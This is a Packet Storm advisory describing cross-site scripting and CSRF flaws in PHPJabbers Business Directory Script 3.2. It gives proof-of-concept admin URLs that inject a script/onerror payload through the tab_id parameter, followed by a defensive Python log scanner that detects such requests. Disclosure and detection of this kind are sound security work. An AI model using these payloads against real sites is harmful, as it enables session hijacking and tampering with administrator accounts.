PHPJabbers Business Directory Script 3.2 Cross Site Request Forgery / Cross Site Scripting

PHPJabbers Business Directory Script version 3.2 suffers from cross site request forgery and cross site scripting vulnerabilities.

Packet Storm

# Exploit Title: PHPJabbers Business Directory Script v3.2 - Multiple Vulnerabilities
# Date: 09/08/2023
# Exploit Author: Kerimcan Ozturk
# Vendor Homepage: https://www.phpjabbers.com/
# Software Link: https://www.phpjabbers.com/business-directory-script/
# Version: 3.2
# Tested on: Windows 10 Pro

## Description

Technical Detail / POC
==========================
Login Account
Go to Property Page (https://website/index.php?controller=pjAdminListings&action=pjActionUpdate)
Edit Any Property (https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57)

[1] Cross-Site Scripting (XSS)

Request:
https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id="<script><image/src/onerror=prompt(8)>

[2] Cross-Site Request Forgery

Request:
https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id="<script><font%20color="green">Kerimcan%20Ozturk</font>

Best Regards
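A defender-side check for the two requests shown above, as an added example that is not part of the original advisory or the vendor's code: it scans web access-log lines for requests to the pjAdminListings controller whose decoded tab_id is not a plain identifier. The log lines are constructed, and the allowlist for legitimate tab_id values (including the sample value tabs-1) is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate tab_id values are short identifiers (letters, digits, "_", "-").
SAFE_TAB_ID = re.compile(r"[A-Za-z0-9_-]{1,32}")
# Request target inside a combined-format access-log line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines; client addresses are from documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Aug/2023:10:00:01 +0000] "GET /index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id=tabs-1 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [09/Aug/2023:10:02:13 +0000] "GET /index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id=%22%3Cscript%3E%3Cimage/src/onerror=prompt(8)%3E HTTP/1.1" 200 5188',
    '192.0.2.10 - - [09/Aug/2023:10:03:40 +0000] "GET /index.php?controller=pjAdminListings&action=pjActionIndex HTTP/1.1" 200 4096',
]


def suspicious_tab_id_requests(lines):
    """Return (client, decoded tab_id) pairs where tab_id is not a plain identifier."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parsable request line
        query = parse_qs(urlsplit(match.group(1)).query)  # percent-decodes once
        if "pjAdminListings" not in query.get("controller", []):
            continue
        for value in query.get("tab_id", []):
            # Allowlist match: markup, quotes and leftover "%" (double encoding) all fail.
            if not SAFE_TAB_ID.fullmatch(value):
                hits.append((line.split(" ", 1)[0], value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_tab_id_requests(SAMPLE_LOG):
        print(f"{client} sent tab_id={value!r}")
```

The same allowlist applied server-side before tab_id is written into the page, combined with HTML-encoding on output, addresses the reflection itself.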
